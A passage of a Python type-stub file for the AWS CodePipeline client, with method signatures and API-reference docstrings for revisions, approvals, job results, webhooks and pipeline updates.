- **owner** *(string) --* **[REQUIRED]**
The creator of the action being called.
- **provider** *(string) --* **[REQUIRED]**
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --* **[REQUIRED]**
A string that describes the action version.
:type maxBatchSize: integer
:param maxBatchSize:
The maximum number of jobs to return in a poll for jobs call.
:rtype: dict
:returns:
"""
pass
def put_action_revision(self, pipelineName: str, stageName: str, actionName: str, actionRevision: Dict) -> Dict:
"""
Provides information to AWS CodePipeline about new revisions to a source.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutActionRevision>`_
**Request Syntax**
::
response = client.put_action_revision(
pipelineName='string',
stageName='string',
actionName='string',
actionRevision={
'revisionId': 'string',
'revisionChangeId': 'string',
'created': datetime(2015, 1, 1)
}
)
**Response Syntax**
::
{
'newRevision': True|False,
'pipelineExecutionId': 'string'
}
**Response Structure**
- *(dict) --*
Represents the output of a PutActionRevision action.
- **newRevision** *(boolean) --*
Indicates whether the artifact revision was previously used in an execution of the specified pipeline.
- **pipelineExecutionId** *(string) --*
The ID of the current workflow state of the pipeline.
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline that will start processing the revision to the source.
:type stageName: string
:param stageName: **[REQUIRED]**
The name of the stage that contains the action that will act upon the revision.
:type actionName: string
:param actionName: **[REQUIRED]**
The name of the action that will process the revision.
:type actionRevision: dict
:param actionRevision: **[REQUIRED]**
Represents information about the version (or revision) of an action.
- **revisionId** *(string) --* **[REQUIRED]**
The system-generated unique ID that identifies the revision number of the action.
- **revisionChangeId** *(string) --* **[REQUIRED]**
The unique identifier of the change that set the state to this revision, for example a deployment ID or timestamp.
- **created** *(datetime) --* **[REQUIRED]**
The date and time when the most recent version of the action was created, in timestamp format.
:rtype: dict
:returns:
"""
pass
def put_approval_result(self, pipelineName: str, stageName: str, actionName: str, result: Dict, token: str) -> Dict:
"""
Provides the response to a manual approval request to AWS CodePipeline. Valid responses include Approved and Rejected.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutApprovalResult>`_
**Request Syntax**
::
response = client.put_approval_result(
pipelineName='string',
stageName='string',
actionName='string',
result={
'summary': 'string',
'status': 'Approved'|'Rejected'
},
token='string'
)
**Response Syntax**
::
{
'approvedAt': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
Represents the output of a PutApprovalResult action.
- **approvedAt** *(datetime) --*
The timestamp showing when the approval or rejection was submitted.
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline that contains the action.
:type stageName: string
:param stageName: **[REQUIRED]**
The name of the stage that contains the action.
:type actionName: string
:param actionName: **[REQUIRED]**
The name of the action for which approval is requested.
:type result: dict
:param result: **[REQUIRED]**
Represents information about the result of the approval request.
- **summary** *(string) --* **[REQUIRED]**
The summary of the current status of the approval request.
- **status** *(string) --* **[REQUIRED]**
The response submitted by a reviewer assigned to an approval action request.
:type token: string
:param token: **[REQUIRED]**
The system-generated token used to identify a unique approval request. The token for each open approval request can be obtained using the GetPipelineState action and is used to validate that the approval request corresponding to this token is still valid.
:rtype: dict
:returns:
"""
pass
def put_job_failure_result(self, jobId: str, failureDetails: Dict):
"""
Represents the failure of a job as returned to the pipeline by a job worker. Only used for custom actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutJobFailureResult>`_
**Request Syntax**
::
response = client.put_job_failure_result(
jobId='string',
failureDetails={
'type': 'JobFailed'|'ConfigurationError'|'PermissionError'|'RevisionOutOfSync'|'RevisionUnavailable'|'SystemUnavailable',
'message': 'string',
'externalExecutionId': 'string'
}
)
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID of the job that failed. This is the same ID returned from PollForJobs.
:type failureDetails: dict
:param failureDetails: **[REQUIRED]**
The details about the failure of a job.
- **type** *(string) --* **[REQUIRED]**
The type of the failure.
- **message** *(string) --* **[REQUIRED]**
The message about the failure.
- **externalExecutionId** *(string) --*
The external ID of the run of the action that failed.
:returns: None
"""
pass
def put_job_success_result(self, jobId: str, currentRevision: Dict = None, continuationToken: str = None, executionDetails: Dict = None):
"""
Represents the success of a job as returned to the pipeline by a job worker. Only used for custom actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutJobSuccessResult>`_
**Request Syntax**
::
response = client.put_job_success_result(
jobId='string',
currentRevision={
'revision': 'string',
'changeIdentifier': 'string',
'created': datetime(2015, 1, 1),
'revisionSummary': 'string'
},
continuationToken='string',
executionDetails={
'summary': 'string',
'externalExecutionId': 'string',
'percentComplete': 123
}
)
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID of the job that succeeded. This is the same ID returned from PollForJobs.
:type currentRevision: dict
:param currentRevision:
The ID of the current revision of the artifact successfully worked upon by the job.
- **revision** *(string) --* **[REQUIRED]**
The revision ID of the current version of an artifact.
- **changeIdentifier** *(string) --* **[REQUIRED]**
The change identifier for the current revision.
- **created** *(datetime) --*
The date and time when the most recent revision of the artifact was created, in timestamp format.
- **revisionSummary** *(string) --*
The summary of the most recent revision of the artifact.
:type continuationToken: string
:param continuationToken:
A token generated by a job worker, such as an AWS CodeDeploy deployment ID, that a successful job provides to identify a custom action in progress. Future jobs will use this token in order to identify the running instance of the action. It can be reused to return additional information about the progress of the custom action. When the action is complete, no continuation token should be supplied.
:type executionDetails: dict
:param executionDetails:
The execution details of the successful job, such as the actions taken by the job worker.
- **summary** *(string) --*
The summary of the current status of the actions.
- **externalExecutionId** *(string) --*
The system-generated unique ID of this action used to identify this job worker in any external systems, such as AWS CodeDeploy.
- **percentComplete** *(integer) --*
The percentage of work completed on the action, represented on a scale of zero to one hundred percent.
:returns: None
"""
pass
def put_third_party_job_failure_result(self, jobId: str, clientToken: str, failureDetails: Dict):
"""
Represents the failure of a third party job as returned to the pipeline by a job worker. Only used for partner actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutThirdPartyJobFailureResult>`_
**Request Syntax**
::
response = client.put_third_party_job_failure_result(
jobId='string',
clientToken='string',
failureDetails={
'type': 'JobFailed'|'ConfigurationError'|'PermissionError'|'RevisionOutOfSync'|'RevisionUnavailable'|'SystemUnavailable',
'message': 'string',
'externalExecutionId': 'string'
}
)
:type jobId: string
:param jobId: **[REQUIRED]**
The ID of the job that failed. This is the same ID returned from PollForThirdPartyJobs.
:type clientToken: string
:param clientToken: **[REQUIRED]**
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:type failureDetails: dict
:param failureDetails: **[REQUIRED]**
Represents information about failure details.
- **type** *(string) --* **[REQUIRED]**
The type of the failure.
- **message** *(string) --* **[REQUIRED]**
The message about the failure.
- **externalExecutionId** *(string) --*
The external ID of the run of the action that failed.
:returns: None
"""
pass
def put_third_party_job_success_result(self, jobId: str, clientToken: str, currentRevision: Dict = None, continuationToken: str = None, executionDetails: Dict = None):
"""
Represents the success of a third party job as returned to the pipeline by a job worker. Only used for partner actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutThirdPartyJobSuccessResult>`_
**Request Syntax**
::
response = client.put_third_party_job_success_result(
jobId='string',
clientToken='string',
currentRevision={
'revision': 'string',
'changeIdentifier': 'string',
'created': datetime(2015, 1, 1),
'revisionSummary': 'string'
},
continuationToken='string',
executionDetails={
'summary': 'string',
'externalExecutionId': 'string',
'percentComplete': 123
}
)
:type jobId: string
:param jobId: **[REQUIRED]**
The ID of the job that successfully completed. This is the same ID returned from PollForThirdPartyJobs.
:type clientToken: string
:param clientToken: **[REQUIRED]**
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:type currentRevision: dict
:param currentRevision:
Represents information about a current revision.
- **revision** *(string) --* **[REQUIRED]**
The revision ID of the current version of an artifact.
- **changeIdentifier** *(string) --* **[REQUIRED]**
The change identifier for the current revision.
- **created** *(datetime) --*
The date and time when the most recent revision of the artifact was created, in timestamp format.
- **revisionSummary** *(string) --*
The summary of the most recent revision of the artifact.
:type continuationToken: string
:param continuationToken:
A token generated by a job worker, such as an AWS CodeDeploy deployment ID, that a successful job provides to identify a partner action in progress. Future jobs will use this token in order to identify the running instance of the action. It can be reused to return additional information about the progress of the partner action. When the action is complete, no continuation token should be supplied.
:type executionDetails: dict
:param executionDetails:
The details of the actions taken and results produced on an artifact as it passes through stages in the pipeline.
- **summary** *(string) --*
The summary of the current status of the actions.
- **externalExecutionId** *(string) --*
The system-generated unique ID of this action used to identify this job worker in any external systems, such as AWS CodeDeploy.
- **percentComplete** *(integer) --*
The percentage of work completed on the action, represented on a scale of zero to one hundred percent.
:returns: None
"""
pass
def put_webhook(self, webhook: Dict) -> Dict:
"""
Defines a webhook and returns a unique webhook URL generated by CodePipeline. This URL can be supplied to third party source hosting providers to call every time there's a code change. When CodePipeline receives a POST request on this URL, the pipeline defined in the webhook is started as long as the POST request satisfied the authentication and filtering requirements supplied when defining the webhook. RegisterWebhookWithThirdParty and DeregisterWebhookWithThirdParty APIs can be used to automatically configure supported third parties to call the generated webhook URL.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutWebhook>`_
**Request Syntax**
::
response = client.put_webhook(
webhook={
'name': 'string',
'targetPipeline': 'string',
'targetAction': 'string',
'filters': [
{
'jsonPath': 'string',
'matchEquals': 'string'
},
],
'authentication': 'GITHUB_HMAC'|'IP'|'UNAUTHENTICATED',
'authenticationConfiguration': {
'AllowedIPRange': 'string',
'SecretToken': 'string'
}
}
)
**Response Syntax**
::
{
'webhook': {
'definition': {
'name': 'string',
'targetPipeline': 'string',
'targetAction': 'string',
'filters': [
{
'jsonPath': 'string',
'matchEquals': 'string'
},
],
'authentication': 'GITHUB_HMAC'|'IP'|'UNAUTHENTICATED',
'authenticationConfiguration': {
'AllowedIPRange': 'string',
'SecretToken': 'string'
}
},
'url': 'string',
'errorMessage': 'string',
'errorCode': 'string',
'lastTriggered': datetime(2015, 1, 1),
'arn': 'string'
}
}
**Response Structure**
- *(dict) --*
- **webhook** *(dict) --*
The detail returned from creating the webhook, such as the webhook name, webhook URL, and webhook ARN.
- **definition** *(dict) --*
The detail returned for each webhook, such as the webhook authentication type and filter rules.
- **name** *(string) --*
The name of the webhook.
- **targetPipeline** *(string) --*
The name of the pipeline you want to connect to the webhook.
- **targetAction** *(string) --*
The name of the action in a pipeline you want to connect to the webhook. The action must be from the source (first) stage of the pipeline.
- **filters** *(list) --*
A list of rules applied to the body/payload sent in the POST request to a webhook URL. All defined rules must pass for the request to be accepted and the pipeline started.
- *(dict) --*
The event criteria that specify when a webhook notification is sent to your URL.
- **jsonPath** *(string) --*
A JsonPath expression that will be applied to the body/payload of the webhook. The value selected by JsonPath expression must match the value specified in the matchEquals field, otherwise the request will be ignored. More information on JsonPath expressions can be found here: https://github.com/json-path/JsonPath.
- **matchEquals** *(string) --*
The value selected by the JsonPath expression must match what is supplied in the MatchEquals field, otherwise the request will be ignored. Properties from the target action configuration can be included as placeholders in this value by surrounding the action configuration key with curly braces. For example, if the value supplied here is "refs/heads/{Branch}" and the target action has an action configuration property called "Branch" with a value of "master", the MatchEquals value will be evaluated as "refs/heads/master". A list of action configuration properties for built-in action types can be found here: `Pipeline Structure Reference Action Requirements <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#action-requirements>`__ .
- **authentication** *(string) --*
Supported options are GITHUB_HMAC, IP and UNAUTHENTICATED.
* GITHUB_HMAC implements the authentication scheme described here: https://developer.github.com/webhooks/securing/
* IP will reject webhooks trigger requests unless they originate from an IP within the IP range whitelisted in the authentication configuration.
* UNAUTHENTICATED will accept all webhook trigger requests regardless of origin.
- **authenticationConfiguration** *(dict) --*
Properties that configure the authentication applied to incoming webhook trigger requests. The required properties depend on the authentication type. For GITHUB_HMAC, only the SecretToken property must be set. For IP, only the AllowedIPRange property must be set to a valid CIDR range. For UNAUTHENTICATED, no properties can be set.
- **AllowedIPRange** *(string) --*
The property used to configure acceptance of webhooks within a specific IP range. For IP, only the AllowedIPRange property must be set, and this property must be set to a valid CIDR range.
- **SecretToken** *(string) --*
The property used to configure GitHub authentication. For GITHUB_HMAC, only the SecretToken property must be set.
- **url** *(string) --*
A unique URL generated by CodePipeline. When a POST request is made to this URL, the defined pipeline is started as long as the body of the post request satisfies the defined authentication and filtering conditions. Deleting and re-creating a webhook will make the old URL invalid and generate a new URL.
- **errorMessage** *(string) --*
The text of the error message about the webhook.
- **errorCode** *(string) --*
The number code of the error.
- **lastTriggered** *(datetime) --*
The date and time a webhook was last successfully triggered, in timestamp format.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the webhook.
:type webhook: dict
:param webhook: **[REQUIRED]**
The detail provided in an input file to create the webhook, such as the webhook name, the pipeline name, and the action name. Give the webhook a unique name which identifies the webhook being defined. You may choose to name the webhook after the pipeline and action it targets so that you can easily recognize what it\'s used for later.
- **name** *(string) --* **[REQUIRED]**
The name of the webhook.
- **targetPipeline** *(string) --* **[REQUIRED]**
The name of the pipeline you want to connect to the webhook.
- **targetAction** *(string) --* **[REQUIRED]**
The name of the action in a pipeline you want to connect to the webhook. The action must be from the source (first) stage of the pipeline.
- **filters** *(list) --* **[REQUIRED]**
A list of rules applied to the body/payload sent in the POST request to a webhook URL. All defined rules must pass for the request to be accepted and the pipeline started.
- *(dict) --*
The event criteria that specify when a webhook notification is sent to your URL.
- **jsonPath** *(string) --* **[REQUIRED]**
A JsonPath expression that will be applied to the body/payload of the webhook. The value selected by JsonPath expression must match the value specified in the matchEquals field, otherwise the request will be ignored. More information on JsonPath expressions can be found here: https://github.com/json-path/JsonPath.
- **matchEquals** *(string) --*
The value selected by the JsonPath expression must match what is supplied in the MatchEquals field, otherwise the request will be ignored. Properties from the target action configuration can be included as placeholders in this value by surrounding the action configuration key with curly braces. For example, if the value supplied here is \"refs/heads/{Branch}\" and the target action has an action configuration property called \"Branch\" with a value of \"master\", the MatchEquals value will be evaluated as \"refs/heads/master\". A list of action configuration properties for built-in action types can be found here: `Pipeline Structure Reference Action Requirements <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#action-requirements>`__ .
- **authentication** *(string) --* **[REQUIRED]**
Supported options are GITHUB_HMAC, IP and UNAUTHENTICATED.
* GITHUB_HMAC implements the authentication scheme described here: https://developer.github.com/webhooks/securing/
* IP will reject webhooks trigger requests unless they originate from an IP within the IP range whitelisted in the authentication configuration.
* UNAUTHENTICATED will accept all webhook trigger requests regardless of origin.
- **authenticationConfiguration** *(dict) --* **[REQUIRED]**
Properties that configure the authentication applied to incoming webhook trigger requests. The required properties depend on the authentication type. For GITHUB_HMAC, only the SecretToken property must be set. For IP, only the AllowedIPRange property must be set to a valid CIDR range. For UNAUTHENTICATED, no properties can be set.
- **AllowedIPRange** *(string) --*
The property used to configure acceptance of webhooks within a specific IP range. For IP, only the AllowedIPRange property must be set, and this property must be set to a valid CIDR range.
- **SecretToken** *(string) --*
The property used to configure GitHub authentication. For GITHUB_HMAC, only the SecretToken property must be set.
:rtype: dict
:returns:
"""
pass
def register_webhook_with_third_party(self, webhookName: str = None) -> Dict:
"""
Configures a connection between the webhook that was created and the external tool with events to be detected.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/RegisterWebhookWithThirdParty>`_
**Request Syntax**
::
response = client.register_webhook_with_third_party(
webhookName='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type webhookName: string
:param webhookName:
The name of an existing webhook created with PutWebhook to register with a supported third party.
:rtype: dict
:returns:
"""
pass
def retry_stage_execution(self, pipelineName: str, stageName: str, pipelineExecutionId: str, retryMode: str) -> Dict:
"""
Resumes the pipeline execution by retrying the last failed actions in a stage.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/RetryStageExecution>`_
**Request Syntax**
::
response = client.retry_stage_execution(
pipelineName='string',
stageName='string',
pipelineExecutionId='string',
retryMode='FAILED_ACTIONS'
)
**Response Syntax**
::
{
'pipelineExecutionId': 'string'
}
**Response Structure**
- *(dict) --*
Represents the output of a RetryStageExecution action.
- **pipelineExecutionId** *(string) --*
The ID of the current workflow execution in the failed stage.
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline that contains the failed stage.
:type stageName: string
:param stageName: **[REQUIRED]**
The name of the failed stage to be retried.
:type pipelineExecutionId: string
:param pipelineExecutionId: **[REQUIRED]**
The ID of the pipeline execution in the failed stage to be retried. Use the GetPipelineState action to retrieve the current pipelineExecutionId of the failed stage
:type retryMode: string
:param retryMode: **[REQUIRED]**
The scope of the retry attempt. Currently, the only supported value is FAILED_ACTIONS.
:rtype: dict
:returns:
"""
pass
def start_pipeline_execution(self, name: str, clientRequestToken: str = None) -> Dict:
"""
Starts the specified pipeline. Specifically, it begins processing the latest commit to the source location specified as part of the pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/StartPipelineExecution>`_
**Request Syntax**
::
response = client.start_pipeline_execution(
name='string',
clientRequestToken='string'
)
**Response Syntax**
::
{
'pipelineExecutionId': 'string'
}
**Response Structure**
- *(dict) --*
Represents the output of a StartPipelineExecution action.
- **pipelineExecutionId** *(string) --*
The unique system-generated ID of the pipeline execution that was started.
:type name: string
:param name: **[REQUIRED]**
The name of the pipeline to start.
:type clientRequestToken: string
:param clientRequestToken:
The system-generated unique ID used to identify a unique execution request.
This field is autopopulated if not provided.
:rtype: dict
:returns:
"""
pass
def update_pipeline(self, pipeline: Dict) -> Dict:
"""
Updates a specified pipeline with edits or changes to its structure. Use a JSON file with the pipeline structure in conjunction with UpdatePipeline to provide the full structure of the pipeline. Updating the pipeline increases the version number of the pipeline by 1.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/UpdatePipeline>`_
**Request Syntax**
::
response = client.update_pipeline(
pipeline={
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'artifactStores': {
'string': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string',
'region': 'string'
},
]
},
],
'version': 123
}
)
**Response Syntax**
::
{
'pipeline': {
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'artifactStores': {
'string': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string',
'region': 'string'
},
]
},
],
'version': 123
}
}
**Response Structure**
- *(dict) --*
Represents the output of an UpdatePipeline action.
- **pipeline** *(dict) --*
The structure of the updated pipeline.
- **name** *(string) --*
The name of the action to be performed.
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
- **artifactStore** *(dict) --*
Represents information about the Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **artifactStores** *(dict) --*
A mapping of artifactStore objects and their corresponding regions. There must be an artifact store for the pipeline region and for each cross-region action within the pipeline. You can only use either artifactStore or artifactStores, not both.
If you create a cross-region action in your pipeline, you must use artifactStores.
- *(string) --*
- *(dict) --*
The Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **stages** *(list) --*
The stage in which to perform the action.
- *(dict) --*
Represents information about a stage and its definition.
- **name** *(string) --*
The name of the stage.
- **blockers** *(list) --*
Reserved for future use.
- *(dict) --*
Reserved for future use.
- **name** *(string) --*
Reserved for future use.
- **type** *(string) --*
Reserved for future use.
- **actions** *(list) --*
The actions included in a stage.
- *(dict) --*
Represents information about an action declaration.
- **name** *(string) --*
The action declaration's name.
- **actionTypeId** *(dict) --*
The configuration information for the action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **runOrder** *(integer) --*
The order in which actions are run.
- **configuration** *(dict) --*
The action declaration's configuration.
- *(string) --*
- *(string) --*
- **outputArtifacts** *(list) --*
The name or ID of the result of the action declaration, such as a test or build artifact.
- *(dict) --*
Represents information about the output of an action.
- **name** *(string) --*
The name of the output of an artifact, such as "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
- **inputArtifacts** *(list) --*
The name or ID of the artifact consumed by the action, such as a test or build artifact.
- *(dict) --*
Represents information about an artifact to be worked on, such as a test or build artifact.
- **name** *(string) --*
The name of the artifact to be worked on, for example, "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
- **roleArn** *(string) --*
The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The action declaration's AWS Region, such as us-east-1.
- **version** *(integer) --*
The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
:type pipeline: dict
:param pipeline: **[REQUIRED]**
The name of the pipeline to be updated.
- **name** *(string) --* **[REQUIRED]**
The name of the action to be performed.
- **roleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
- **artifactStore** *(dict) --*
Represents information about the Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --* **[REQUIRED]**
The type of the artifact store, such as S3.
- **location** *(string) --* **[REQUIRED]**
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --* **[REQUIRED]**
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --* **[REQUIRED]**
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to \'KMS\'.
- **artifactStores** *(dict) --*
A mapping of artifactStore objects and their corresponding regions. There must be an artifact store for the pipeline region and for each cross-region action within the pipeline. You can only use either artifactStore or artifactStores, not both.
If you create a cross-region action in your pipeline, you must use artifactStores.
- *(string) --*
- *(dict) --*
The Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --* **[REQUIRED]**
The type of the artifact store, such as S3.
- **location** *(string) --* **[REQUIRED]**
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --* **[REQUIRED]**
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --* **[REQUIRED]**
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to \'KMS\'.
- **stages** *(list) --* **[REQUIRED]**
The stage in which to perform the action.
- *(dict) --*
Represents information about a stage and its definition.
- **name** *(string) --* **[REQUIRED]**
The name of the stage.
- **blockers** *(list) --*
Reserved for future use.
- *(dict) --*
Reserved for future use.
- **name** *(string) --* **[REQUIRED]**
Reserved for future use.
- **type** *(string) --* **[REQUIRED]**
Reserved for future use.
- **actions** *(list) --* **[REQUIRED]**
The actions included in a stage.
- *(dict) --*
Represents information about an action declaration.
- **name** *(string) --* **[REQUIRED]**
The action declaration\'s name.
- **actionTypeId** *(dict) --* **[REQUIRED]**
The configuration information for the action type.
- **category** *(string) --* **[REQUIRED]**
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --* **[REQUIRED]**
The creator of the action being called.
- **provider** *(string) --* **[REQUIRED]**
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --* **[REQUIRED]**
A string that describes the action version.
- **runOrder** *(integer) --*
The order in which actions are run.
- **configuration** *(dict) --*
The action declaration\'s configuration.
- *(string) --*
- *(string) --*
- **outputArtifacts** *(list) --*
The name or ID of the result of the action declaration, such as a test or build artifact.
- *(dict) --*
Represents information about the output of an action.
- **name** *(string) --* **[REQUIRED]**
The name of the output of an artifact, such as \"My App\".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
- **inputArtifacts** *(list) --*
The name or ID of the artifact consumed by the action, such as a test or build artifact.
- *(dict) --*
Represents information about an artifact to be worked on, such as a test or build artifact.
- **name** *(string) --* **[REQUIRED]**
The name of the artifact to be worked on, for example, \"My App\".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
- **roleArn** *(string) --*
The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The action declaration\'s AWS Region, such as us-east-1.
- **version** *(integer) --*
The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
:rtype: dict
:returns:
"""
pass
| 60.88176
| 805
| 0.522984
| 19,611
| 199,266
| 5.300699
| 0.043904
| 0.016835
| 0.008918
| 0.010389
| 0.84489
| 0.818984
| 0.803554
| 0.786603
| 0.775935
| 0.762785
| 0
| 0.005466
| 0.392245
| 199,266
| 3,272
| 806
| 60.900367
| 0.852896
| 0.851073
| 0
| 0.45122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.45122
| false
| 0.45122
| 0.085366
| 0
